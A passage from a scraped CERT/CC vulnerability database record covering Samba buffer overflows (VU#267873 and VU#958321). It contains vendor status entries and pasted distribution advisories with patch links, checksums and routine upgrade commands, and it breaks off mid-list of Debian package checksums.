10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nMontaVista was vulnerable to this issue.\n\n \nWe advise customers to use our support web site or contact their support representative for an updated package. \n\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ OpenBSD\n\nNotified: April 09, 2003 Updated: April 14, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n&lt;<http://www.openbsd.org/cgi-bin/cvsweb/ports/net/samba/stable/distinfo#rev1.5.2.3>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ OpenPKG\n\nUpdated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [OpenPKG-SA-2003.028](<http://www.openpkg.org/security/OpenPKG-SA-2003.028-samba.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ Red Hat Inc.\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nRed Hat Linux and Red Hat Enterprise Linux ship with a Samba package vulnerable to this issue. Updated Samba packages are available along with our advisory at the URLs below. Users of the Red Hat Network can update their systems using the 'up2date' tool. \nRed Hat Linux: \n\n\n<http://rhn.redhat.com/errata/RHSA-2003-137.html> \nRed Hat Enterprise Linux: \n \n<http://rhn.redhat.com/errata/RHSA-2003-138.html>\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ SCO\n\nNotified: April 09, 2003 Updated: May 15, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [CSSA-2003-017](<ftp://ftp.sco.com/pub/security/OpenLinux/CSSA-2003-017.0.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ SGI\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see SGI Security Advisory [20030403-01-P](<ftp://patches.sgi.com/support/free/security/advisories/20030403-01-P>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Samba Team\n\nUpdated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThese vulnerabilities are addressed in Samba 2.2.8a:\n\n&lt;<http://lists.samba.org/pipermail/samba-announce/2003-April/000065.html>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Samba-TNG\n\nUpdated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThese vulnerabilities are addressed in Samba-TNG 0.3.2:\n\n&lt;<http://www.samba-tng.org/download/tng/announcement-0.3.2.txt>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ Slackware\n\nUpdated: April 10, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`[slackware-security] Samba security problem fixed \n` \n`The samba packages in Slackware 8.1 and 9.0 have been upgraded to \nSamba 2.2.8a to fix a security problem. \n` \n`All sites running samba should upgrade. \n` \n \n`Here are the details from the Slackware 9.0 ChangeLog: \n+--------------------------+ \nMon Apr 7 14:26:53 PDT 2003 \npatches/packages/samba-2.2.8a-i386-1.tgz: Upgraded to samba-2.2.8a. \nFrom the samba-2.2.8a WHATSNEW.txt: \n` \n` **************************************** \n* IMPORTANT: Security bugfix for Samba * \n**************************************** \n` \n` Digital Defense, Inc. has alerted the Samba Team to a serious \nvulnerability in all stable versions of Samba currently shipping. \nThe Common Vulnerabilities and Exposures (CVE) project has assigned \nthe ID CAN-2003-0201 to this defect. \n` \n` This vulnerability, if exploited correctly, leads to an anonymous \nuser gaining root access on a Samba serving system. All versions \nof Samba up to and including Samba 2.2.8 are vulnerable. An active \nexploit of the bug has been reported in the wild. Alpha versions of \nSamba 3.0 and above are *NOT* vulnerable. \n` \n`(* Security fix *) \n+--------------------------+ \n` \n`More information may be found in the Samba 2.2.8a release notes. \n` \n \n \n`WHERE TO FIND THE NEW PACKAGES: \n+-----------------------------+ \n` \n`Updated Samba package for Slackware 8.1: \n``<ftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/samba-2.2.8a-i386-1.tgz>`` \n` \n`Updated Samba package for Slackware 9.0: \n``<ftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/samba-2.2.8a-i386-1.tgz>`` \n` \n \n \n`MD5 SIGNATURES: \n+-------------+ \n` \n`Here are the md5sums for the packages: \n` \n`Slackware 8.1 package: \n875ef129196f56d71c833911f3156cd5 samba-2.2.8a-i386-1.tgz \n` \n`Slackware 9.0 package: \nd1d2b689b79a1a8dfc0ee34fd390e72c samba-2.2.8a-i386-1.tgz \n` \n \n \n`INSTALLATION INSTRUCTIONS: \n+------------------------+ \n` \n`As root, stop the samba server: \n` \n`. /etc/rc.d/rc.samba stop \n` \n`Next, upgrade the samba package(s) with upgradepkg: \n` \n`upgradepkg samba-2.2.8a-i386-1.tgz \n` \n`Finally, start samba again: \n` \n`. /etc/rc.d/rc.samba start \n` \n \n \n`+-----+ \n` \n`Slackware Linux Security Team \n``<http://slackware.com/gpg-key>`` \nsecurity@slackware.com \n` \n`+------------------------------------------------------------------------+ \n| HOW TO REMOVE YOURSELF FROM THIS MAILING LIST: | \n+------------------------------------------------------------------------+ \n| Send an email to majordomo@slackware.com with this text in the body of | \n| the email message: | \n| | \n| unsubscribe slackware-security | \n| | \n| You will get a confirmation message back. Follow the instructions to | \n| complete the unsubscription. Do not reply to this message to | \n| unsubscribe! | \n+------------------------------------------------------------------------+ \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.2.1 (GNU/Linux) \n` \n`iD8DBQE+kfZlakRjwEAQIjMRAunYAJwO7tAYu+nT6eK3pl/QUFDRNJK5RACfb27W \nsky8+QhsZnx0/Jezsuk0EwY= \n=BAYr \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Sorceror Linux\n\nUpdated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n&lt;<http://www.securityfocus.com/archive/1/317758/2003-04-06/2003-04-12/0>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ SuSE Inc.\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SuSE-SA:2003:025](<http://www.suse.de/de/security/2003_025_samba.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ Sun Microsystems Inc.\n\nNotified: April 09, 2003 Updated: July 03, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nSun includes a version of Samba with Solaris 9 which is affected by this issue. Sun provides Samba on the Solaris Companion CD for Solaris 2.6, 7, and 8: \n\n\n<http://wwws.sun.com/software/solaris/freeware/index.html> \n \nas an unsupported package which installs to /opt/sfw and is vulnerable to this issue too. Sites using the freeware version of Samba from the Solaris Companion CD will have to upgrade to a later version from Samba.org. Sun has published Sun Alert 53581 for this issue describing the workaround options here: \n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/53581> \n \nThe Sun Alert will be updated with the patch information as soon as it becomes available.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSun Cobalt systems are also affected: &lt;<http://www.secunia.com/advisories/8809/>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Trustix\n\nUpdated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [TSLSA-2003-0019](<http://www.trustix.net/errata/misc/2003/TSL-2003-0019-samba.asc.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Wirex\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n&lt;<http://www.securityfocus.com/archive/1/317687/2003-04-06/2003-04-12/0>&gt;\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ __ Ingrian Networks\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Not Vulnerable\n\n### Vendor Statement\n\nIngrian Platforms do not include Samba and thus are not affected by this issue.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Cray Inc.\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Data General\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Fujitsu\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Guardian Digital Inc.\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ NEC Corporation\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ NetBSD\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Nokia\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Openwall GNU/*/Linux\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Sequent\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Sony Corporation\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Unisys\n\nNotified: April 09, 2003 Updated: April 10, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\n### __ Wind River Systems Inc.\n\nNotified: April 09, 2003 Updated: April 09, 2003 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23267873 Feedback>).\n\nView all 35 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://lists.samba.org/pipermail/samba-announce/2003-April/000065.html>\n * <http://lists.samba.org/pipermail/samba-announce/2003-March/000063.html>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0201>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0196>\n * <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0085>\n * <http://www.kb.cert.org/vuls/id/298233>\n * <http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0008.html>\n * <http://www.samba-tng.org/download/tng/announcement-0.3.2.txt>\n * <http://www.samba-tng.org/>\n * <http://www.samba.org/>\n * <http://www.securityfocus.com/bid/7294>\n\n### Acknowledgements\n\nThis vulnerability was publicly reported by Erik Parker of Digital Defense Inc.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2003-0201](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0201>) \n---|--- \n**Severity Metric:****** | 20.48 \n**Date Public:** | 2003-04-07 \n**Date First Published:** | 2003-04-10 \n**Date Last Updated: ** | 2003-07-10 20:59 UTC \n**Document Revision: ** | 22 \n", "modified": "2003-07-10T20:59:00", "published": "2003-04-10T00:00:00", "id": "VU:267873", "href": "https://www.kb.cert.org/vuls/id/267873", "type": "cert", "title": "Samba contains multiple buffer overflows", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T19:52:57", "bulletinFamily": "info", "description": "### Overview \n\nA remotely exploitable stack buffer overflow exists in the Samba server daemon ([smbd](<http://us1.samba.org/samba/docs/man/smbd.8.html>)).\n\n### Description \n\nVersions 2.2.2 through 2.2.6 of Samba contain a remotely exploitable stack buffer overflow. The [Samba Team](<http://us1.samba.org/samba/team.html>) describes [Samba](<http://us1.samba.org/samba/docs/man/samba.7.html>) [](<http://us1.samba.org/samba/docs/man/samba.7.html>)as follows:\n\n`The Samba software suite is a collection of programs that implements the Server Message Block (commonly abbreviated as SMB) protocol for UNIX systems. This protocol is sometimes also referred to as the Common Internet File System (CIFS), LanManager or NetBIOS protocol.` \nThe Samba Team[](<http://us1.samba.org/samba/team.html>) describes [](<http://www.samba.org/samba/whatsnew/samba-2.2.7.html>)the [vulnerability](<http://us1.samba.org/samba/whatsnew/samba-2.2.7.html>) as follows: \n`There was a bug in the length checking for encrypted password change requests from clients. A client could potentially send an encrypted password, which, when decrypted with the old hashed password could be used as a buffer overrun attack on the stack of smbd. The attach would have to be crafted such that converting a DOS codepage string to little endian UCS2 unicode would translate into an executable block of code.` \n \n--- \n \n### Impact \n\nA remote attacker can execute arbitrary code with superuser privileges or can cause smbd to crash. \n \n--- \n \n### Solution \n\nApply a patch from your vendor. \n \n--- \n \n### Vendor Information\n\n958321\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Conectiva\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n`\n\n`- -------------------------------------------------------------------------- \nCONECTIVA LINUX SECURITY ANNOUNCEMENT \n- -------------------------------------------------------------------------- \n` \n`PACKAGE : samba \nSUMMARY : Buffer overflow vulnerability \nDATE : 2002-11-22 16:13:00 \nID : CLA-2002:550 \nRELEVANT \nRELEASES : 6.0, 7.0, 8 \n` \n`- ------------------------------------------------------------------------- \n` \n`DESCRIPTION \nSamba is a server that provides SMB services such as file and printer \nsharing for other SMB clients, such as Windows(R). \n` \n` Steve Langasek and Eloy Paris discovered a vulnerability in Samba \nversions 2.2.2 to 2.2.6 which may allow a remote attacker to execute \narbitrary code in the server context. The vulnerability, which is a \nbuffer overflow in a function used to decrypt hashed passwords, can \nbe exploited by an attacker when authenticating a valid account in \nthe samba server. In order to sucessfully run arbitrary code, the \noverflow must be crafted such that converting a DOS codepage string \nto little endian UCS2 unicode translates into an executable block of \ncode. \n` \n` This update also adds other fixes for potential buffer overflows from \nsamba 2.2.7 that are not part of the standard patch supplied by the \nsamba authors in their announcement[1]. The samba package distributed \nin Conectiva Linux 6.0 (samba-2.0.9) is not vulnerable to the \nannounced buffer overflow, but it is being upgraded with these \naditional fixes. \n` \n \n`SOLUTION \nAll samba users should upgrade their packages immediately. This \nupdate will automatically restart the samba service if it is already \nrunning. \n` \n \n` REFERENCES: \n1.http://us1.samba.org/samba/whatsnew/samba-2.2.7.html \n` \n \n`DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-2.0.9-2U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-clients-2.0.9-2U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-doc-2.0.9-2U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/RPMS/samba-swat-2.0.9-2U60_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/samba-2.0.9-2U60_2cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/samba-2.2.1a-1U70_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/samba-clients-2.2.1a-1U70_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/samba-codepagesource-2.2.1a-1U70_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/samba-common-2.2.1a-1U70_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/samba-doc-2.2.1a-1U70_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/RPMS/samba-swat-2.2.1a-1U70_2cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/samba-2.2.1a-1U70_2cl.src.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/8/RPMS/samba-2.2.3a-2U80_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/8/RPMS/samba-clients-2.2.3a-2U80_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/8/RPMS/samba-codepagesource-2.2.3a-2U80_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/8/RPMS/samba-common-2.2.3a-2U80_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/8/RPMS/samba-doc-2.2.3a-2U80_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/8/RPMS/samba-swat-2.2.3a-2U80_1cl.i386.rpm>`` \n``<ftp://atualizacoes.conectiva.com.br/8/SRPMS/samba-2.2.3a-2U80_1cl.src.rpm>`` \n` \n \n`ADDITIONAL INSTRUCTIONS \nUsers of Conectiva Linux version 6.0 or higher may use apt to perform \nupgrades of RPM packages: \n- add the following line to /etc/apt/sources.list if it is not there yet \n(you may also use linuxconf to do this): \n` \n` rpm [cncbr] ``<ftp://atualizacoes.conectiva.com.br>`` 6.0/conectiva updates \n` \n`(replace 6.0 with the correct version number if you are not running CL6.0) \n` \n` - run: apt-get update \n- after that, execute: apt-get upgrade \n` \n` Detailed instructions reagarding the use of apt and upgrade examples \ncan be found at ``<http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en>`` \n` \n \n`- ------------------------------------------------------------------------- \nAll packages are signed with Conectiva's GPG key. The key and instructions \non how to import it can be found at \n``<http://distro.conectiva.com.br/seguranca/chave/?idioma=en>`` \nInstructions on how to check the signatures of the RPM packages can be \nfound at ``<http://distro.conectiva.com.br/seguranca/politica/?idioma=en>`` \n- ------------------------------------------------------------------------- \nAll our advisories and generic update instructions can be viewed at \n``<http://distro.conectiva.com.br/atualizacoes/?idioma=en>`` \n` \n`- ------------------------------------------------------------------------- \nsubscribe: conectiva-updates-subscribe@papaleguas.conectiva.com.br \nunsubscribe: conectiva-updates-unsubscribe@papaleguas.conectiva.com.br \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.6 (GNU/Linux) \nComment: For info see ``<http://www.gnupg.org>`` \n` \n`iD8DBQE93nQm42jd0JmAcZARArgCAJ9YPRJ1FpbqRjsEGxzJyNwFVpx+5wCghRqK \nz0/Pjh2DW/QHKDirF+aPSMM= \n=YuUd \n-----END PGP SIGNATURE-----`\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23958321 Feedback>).\n\n### __ __ Debian\n\nUpdated: December 13, 2002 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n`\n\n`- ------------------------------------------------------------------------ \nDebian Security Advisory DSA-200-1 security@debian.org \n``<http://www.debian.org/security/>`` Wichert Akkerman \nNovember 22, 2002 \n- ------------------------------------------------------------------------ \n` \n \n`Package : samba \nProblem type : remote exploit \nDebian-specific: no \n` \n`Steve Langasek found an exploitable bug in the password handling \ncode in samba: when converting from DOS code-page to little endian \nUCS2 unicode a buffer length was not checked and a buffer could \nbe overflowed. There is no known exploit for this, but an upgrade \nis strongly recommended. \n` \n`This problem has been fixed in version 2.2.3a-12 of the Debian \nsamba packages and upstream version 2.2.7. \n` \n \n`- ------------------------------------------------------------------------ \n` \n`Obtaining updates: \n` \n` By hand: \nwget URL \nwill fetch the file for you. \ndpkg -i FILENAME.deb \nwill install the fetched file. \n` \n` With apt: \ndeb ``<http://security.debian.org/>`` stable/updates main \nadded to /etc/apt/sources.list will provide security updates \n` \n`Additional information can be found on the Debian security webpages \nat ``<http://www.debian.org/security/>`` \n` \n`- ------------------------------------------------------------------------ \n` \n \n`Debian GNU/Linux 3.0 alias woody \n- -------------------------------- \n` \n` Woody was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel, \npowerpc, s390 and sparc. At this moments updates for m68k, mips and \nmipsel are not yet available. \n` \n` Source archives: \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.dsc>`` \nSize/MD5 checksum: 1469 5db10f38dc411972fed1e8e79ac9e2cb \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a.orig.tar.gz>`` \nSize/MD5 checksum: 5460531 b6ec2f076af69331535a82b586f55254 \n``<http://security.debian.org/pool/updates/main/s/samba/samba_2.2.3a-12.diff.gz>`` \nSize/MD5 checksum: 116834 55b9c9ed1e423608838b5493eec9f727 \n` \n` Architecture independent packages: \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/samba-doc_2.2.3a-12_all.deb>`` \nSize/MD5 checksum: 2446440 dca2cc174c245ee12e601f1ba2b115e9 \n` \n` alpha architecture (DEC Alpha) \n` \n` ``<http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 415200 163bd412f5fd1ec9a2a125e0b1b024ba \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 598938 037ca8de5dbf1462e0c17a88c7cd35bc \n``<http://security.debian.org/pool/updates/main/s/samba/smbfs_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 946742 47bdd6c9a6088326e6842265e3de6f8e \n``<http://security.debian.org/pool/updates/main/s/samba/samba-common_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 1130570 8f88729028cd3cd368435bc5feb282fb \n``<http://security.debian.org/pool/updates/main/s/samba/swat_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 622300 c22e7b482598b6c61a99410d50e1c0d6 \n``<http://security.debian.org/pool/updates/main/s/samba/libsmbclient_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 488062 858e115dc3176c975c096e1328c08d49 \n``<http://security.debian.org/pool/updates/main/s/samba/winbind_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 1105314 0bd614d744080ebd3383898871f73fd3 \n``<http://security.debian.org/pool/updates/main/s/samba/smbclient_2.2.3a-12_alpha.deb>`` \nSize/MD5 checksum: 1153962 8d1fcb828d6640136aaa93397fef3a4c 